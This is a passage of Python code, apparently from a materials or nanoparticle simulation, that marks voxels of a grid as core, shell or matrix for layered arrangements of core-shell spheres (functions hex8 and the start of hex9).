cc=float(((xx23/(div))**2+(yy23/(div))**2+(zz23/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx24/(div))**2+(yy24/(div))**2+(zz24/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx25/(div))**2+(yy25/(div))**2+(zz25/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx26/(div))**2+(yy26/(div))**2+(zz26/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
return A
##################################################################################################################################
###########################################################################################################################
def hex8 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs):
for k in range(zini,zfin+1):
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
a=int(i)
b=int(j+(k-1)*Dy1)
xx1=((6)*radiusc/dl-i+1)
yy1= ((6+1)*radiusc/dl-j+1)
zz1=(radiusc/dl-k+1)
xx2=((6-1.0)*radiusc/dl-i+1)
yy2= ((6+1-sqrt(3.0))*radiusc/dl-j+1)
zz2=(radiusc/dl-k+1)
xx3=((6+1.0)*radiusc/dl-i+1)
yy3= ((6+1-sqrt(3.0))*radiusc/dl-j+1)
zz3=(radiusc/dl-k+1)
xx4=((6-1.0)*radiusc/dl-i+1)
yy4= ((6+1+sqrt(3.0))*radiusc/dl-j+1)
zz4=(radiusc/dl-k+1)
xx5=((6+1.0)*radiusc/dl-i+1)
yy5= ((6+1+sqrt(3.0))*radiusc/dl-j+1)
zz5=(radiusc/dl-k+1)
xx6=(4*radiusc/dl-i+1)
yy6= ((6+1)*radiusc/dl-j+1)
zz6=(radiusc/dl-k+1)
xx7=(8*radiusc/dl-i+1)
yy7= ((6+1)*radiusc/dl-j+1)
zz7=(1*radiusc/dl-k+1)
xx8=((6)*radiusc/dl-i+1)
yy8= ((8+1+sqrt(2.0))*radiusc/dl-j+1)
zz8=(1*radiusc/dl-k+1)
xx9=((6)*radiusc/dl-i+1)
yy9= ((4+1-sqrt(2.0))*radiusc/dl-j+1)
zz9=(1*radiusc/dl-k+1)
xx10=((10.0)*radiusc/dl-i+1)
yy10= ((6.0+1)*radiusc/dl-j+1)
zz10=(1*radiusc/dl-k+1)
xx11=((3-1.0)*radiusc/dl-i+1)
yy11= ((6.0+1)*radiusc/dl-j+1)
zz11=(1*radiusc/dl-k+1)
xx12=((3)*radiusc/dl-i+1)
yy12= ((6+1-sqrt(3.0))*radiusc/dl-j+1)
zz12=(1*radiusc/dl-k+1)
xx13=(9*radiusc/dl-i+1)
yy13= ((6+1-sqrt(3.0))*radiusc/dl-j+1)
zz13=(1*radiusc/dl-k+1)
xx14=((9+0.05)*radiusc/dl-i+1)
yy14= ((6+1+sqrt(3.0))*radiusc/dl-j+1)
zz14=(1*radiusc/dl-k+1)
xx15=((3)*radiusc/dl-i+1)
yy15= ((6+1+sqrt(3.0))*radiusc/dl-j+1)
zz15=((1)*radiusc/dl-k+1)
xx16=((3+1+0.05)*radiusc/dl-i+1)
yy16= ((11+1-sqrt(3.0)+0.15)*radiusc/dl-j+1)
zz16=((1)*radiusc/dl-k+1)
xx17=((8)*radiusc/dl-i+1)
yy17= ((11+1-sqrt(3.0)+0.15)*radiusc/dl-j+1)
zz17=((1)*radiusc/dl-k+1)
xx18=((8)*radiusc/dl-i+1)
yy18= ((1+1+sqrt(3.0)-0.1)*radiusc/dl-j+1)
zz18=((1)*radiusc/dl-k+1)
xx19=((4)*radiusc/dl-i+1)
yy19= ((1+1+sqrt(3.0)-0.1)*radiusc/dl-j+1)
zz19=((1)*radiusc/dl-k+1)
# second layer
xx20 = (6*(radiuscore + (radiusc-radiuscore))/dl-i);
yy20 = (7*(radiuscore+(radiusc-radiuscore))/dl-j);
zz20 = (3*(radiuscore+(radiusc-radiuscore))/dl-k+1);
xx21 = (5*(radiuscore + (radiusc-radiuscore))/dl-i);
yy21 = ((7-sqrt(3.0))*(radiuscore+(radiusc-radiuscore))/dl-j);
zz21 = (3*(radiuscore+(radiusc-radiuscore))/dl-k+1);
xx22 = (7*(radiuscore + (radiusc-radiuscore))/dl-i);
yy22 = ((7-sqrt(3.0))*(radiuscore+(radiusc-radiuscore))/dl-j);
zz22 = (3*(radiuscore+(radiusc-radiuscore))/dl-k+1);
xx23 = (5*(radiuscore + (radiusc-radiuscore))/dl-i);
yy23 = ((7+sqrt(3.0))*(radiuscore+(radiusc-radiuscore))/dl-j);
zz23 = (3*(radiuscore+(radiusc-radiuscore))/dl-k+1);
xx24 = (7*(radiuscore + (radiusc-radiuscore))/dl-i);
yy24 = ((7+sqrt(3.0))*(radiuscore+(radiusc-radiuscore))/dl-j);
zz24 = (3*(radiuscore+(radiusc-radiuscore))/dl-k+1);
xx25 = (4*(radiuscore + (radiusc-radiuscore))/dl-i);
yy25 = (7*(radiuscore+(radiusc-radiuscore))/dl-j);
zz25 = (3*(radiuscore+(radiusc-radiuscore))/dl-k+1);
xx26 = (8*(radiuscore + (radiusc-radiuscore))/dl-i);
yy26 = (7*(radiuscore+(radiusc-radiuscore))/dl-j);
zz26 = (3*(radiuscore+(radiusc-radiuscore))/dl-k+1);
# third layer
xx27 = (5*(radiuscore + (radiusc-radiuscore))/dl-i);
yy27 = (7*(radiuscore+(radiusc-radiuscore))/dl-j);
zz27 = ((3+sqrt(3.0))*(radiuscore+(radiusc-radiuscore))/dl-k+1);
xx28 = (7*(radiuscore + (radiusc-radiuscore))/dl-i);
yy28 = (7*(radiuscore+(radiusc-radiuscore))/dl-j);
zz28 = ((3+sqrt(3.0))*(radiuscore+(radiusc-radiuscore))/dl-k+1);
xx29 = (6*(radiuscore + (radiusc-radiuscore))/dl-i);
yy29 = ((8.0+sqrt(2.0)/2)*(radiuscore+(radiusc-radiuscore))/dl-j);
zz29 = ((3+sqrt(3.0))*(radiuscore+(radiusc-radiuscore))/dl-k+1);
xx30 = (6*(radiuscore + (radiusc-radiuscore))/dl-i);
yy30 = ((6.0-sqrt(2.0)/2)*(radiuscore+(radiusc-radiuscore))/dl-j);
zz30 = ((3+sqrt(3.0))*(radiuscore+(radiusc-radiuscore))/dl-k+1);
# fourth layer
xx31 = (6*(radiuscore + (radiusc-radiuscore))/dl-i);
yy31 = ((7.0-sqrt(3.0)/2)*(radiuscore+(radiusc-radiuscore))/dl-j);
zz31 = ((3+2*sqrt(3.0))*(radiuscore+(radiusc-radiuscore))/dl-k+1);
xx32 = (6*(radiuscore + (radiusc-radiuscore))/dl-i);
yy32 = ((7.0+sqrt(3.0)/2)*(radiuscore+(radiusc-radiuscore))/dl-j);
zz32 = ((3+2*sqrt(3.0))*(radiuscore+(radiusc-radiuscore))/dl-k+1);
# fifth layer
xx33 = (6*(radiuscore + (radiusc-radiuscore))/dl-i);
yy33 = ((7.0)*(radiuscore+(radiusc-radiuscore))/dl-j);
zz33 = ((3+3*sqrt(3.0))*(radiuscore+(radiusc-radiuscore))/dl-k+1);
div=float(radiusc)/float(dl)
cc=float(((xx1/(div))**2+(yy1/(div))**2+(zz1/(div))**2) )
# print (xx11,yy11,zz11,3+sqrt(3.0),float(radiusc/dl))
# print radiuscore,radiusshell,radiusc
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx2/(div))**2+(yy2/(div))**2+(zz2/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx3/(div))**2+(yy3/(div))**2+(zz3/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx4/(div))**2+(yy4/(div))**2+(zz4/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx5/(div))**2+(yy5/(div))**2+(zz5/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx6/(div))**2+(yy6/(div))**2+(zz6/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx7/(div))**2+(yy7/(div))**2+(zz7/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx8/(div))**2+(yy8/(div))**2+(zz8/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx9/(div))**2+(yy9/(div))**2+(zz9/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx10/(div))**2+(yy10/(div))**2+(zz10/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx11/(div))**2+(yy11/(div))**2+(zz11/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
# print('aqui')
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx12/(div))**2+(yy12/(div))**2+(zz12/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx13/(div))**2+(yy13/(div))**2+(zz13/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx14/(div))**2+(yy14/(div))**2+(zz14/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx15/(div))**2+(yy15/(div))**2+(zz15/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx16/(div))**2+(yy16/(div))**2+(zz16/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx17/(div))**2+(yy17/(div))**2+(zz17/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx18/(div))**2+(yy18/(div))**2+(zz18/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx19/(div))**2+(yy19/(div))**2+(zz19/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx20/(div))**2+(yy20/(div))**2+(zz20/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx21/(div))**2+(yy21/(div))**2+(zz21/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx22/(div))**2+(yy22/(div))**2+(zz22/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx23/(div))**2+(yy23/(div))**2+(zz23/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx24/(div))**2+(yy24/(div))**2+(zz24/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx25/(div))**2+(yy25/(div))**2+(zz25/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx26/(div))**2+(yy26/(div))**2+(zz26/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx27/(div))**2+(yy27/(div))**2+(zz27/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx28/(div))**2+(yy28/(div))**2+(zz28/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx29/(div))**2+(yy29/(div))**2+(zz29/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx30/(div))**2+(yy30/(div))**2+(zz30/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx31/(div))**2+(yy31/(div))**2+(zz31/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx32/(div))**2+(yy32/(div))**2+(zz32/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx33/(div))**2+(yy33/(div))**2+(zz33/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
return A
##################################################################################################################################
###########################################################################################################################
def hex9 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs):
for k in range(zini,zfin+1):
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
a=int(i)
b=int(j+(k-1)*Dy1)
xx1=((6)*radiusc/dl-i+1)
yy1= ((7)*radiusc/dl-j+1)
zz1=(radiusc/dl-k+1)
xx2=((6-1.0)*radiusc/dl-i+1)
yy2= ((7-sqrt(3.0))*radiusc/dl-j+1)
zz2=(radiusc/dl-k+1)
xx3=((6+1.0)*radiusc/dl-i+1)
yy3= ((7-sqrt(3.0))*radiusc/dl-j+1)
zz3=(radiusc/dl-k+1)
xx4=((6-1.0)*radiusc/dl-i+1)
yy4= ((7+sqrt(3.0))*radiusc/dl-j+1)
zz4=(radiusc/dl-k+1)
xx5=((6+1.0)*radiusc/dl-i+1)
yy5= ((7+sqrt(3.0))*radiusc/dl-j+1)
zz5=(radiusc/dl-k+1)
xx6=(4*radiusc/dl-i+1)
yy6= (7*radiusc/dl-j+1)
zz6=(radiusc/dl-k+1)
xx7=(8*radiusc/dl-i+1)
yy7= (7*radiusc/dl-j+1)
zz7=(1*radiusc/dl-k+1)
xx8=((6)*radiusc/dl-i+1)
yy8= ((9+sqrt(2.0))*radiusc/dl-j+1)
zz8=(1*radiusc/dl-k+1)
xx9=((6)*radiusc/dl-i+1)
yy9= ((5-sqrt(2.0))*radiusc/dl-j+1)
zz9=(1*radiusc/dl-k+1)
xx10=((10.0)*radiusc/dl-i+1)
yy10= ((7.0)*radiusc/dl-j+1)
zz10=(1*radiusc/dl-k+1)
xx11=((3-1.0)*radiusc/dl-i+1)
yy11= ((7.0)*radiusc/dl-j+1)
zz11=(1*radiusc/dl-k+1)
xx12=((3)*radiusc/dl-i+1)
yy12= ((7-sqrt(3.0))*radiusc/dl-j+1)
zz12=(1*radiusc/dl-k+1)
xx13=(9*radiusc/dl-i+1)
yy13= ((7-sqrt(3.0))*radiusc/dl-j+1)
zz13=(1*radiusc/dl-k+1)
xx14=((9+0.05)*radiusc/dl-i+1)
yy14= ((7+sqrt(3.0))*radiusc/dl-j+1)
zz14=(1*radiusc/dl-k+1)
xx15=((3)*radiusc/dl-i+1)
yy15= ((7+sqrt(3.0))*radiusc/dl-j+1)
zz15=((1)*radiusc/dl-k+1)
xx16=((3+1+0.05)*radiusc/dl-i+1)
yy16= ((12-sqrt(3.0)+0.15)*radiusc/dl-j+1)
zz16=((1)*radiusc/dl-k+1)
xx17=((8)*radiusc/dl-i+1)
yy17= ((12-sqrt(3.0)+0.15)*radiusc/dl-j+1)
zz17=((1)*radiusc/dl-k+1)
xx18=((8)*radiusc/dl-i+1)
yy18= ((2+sqrt(3.0)-0.1)*radiusc/dl-j+1)
zz18=((1)*radiusc/dl-k+1)
xx19=((4)*radiusc/dl-i+1)
yy19= ((2+sqrt(3.0)-0.1)*radiusc/dl-j+1)
zz19=((1)*radiusc/dl-k+1)
# second layer
xx20=((5)*radiusc/dl-i+1)
yy20= ((7)*radiusc/dl-j+1)
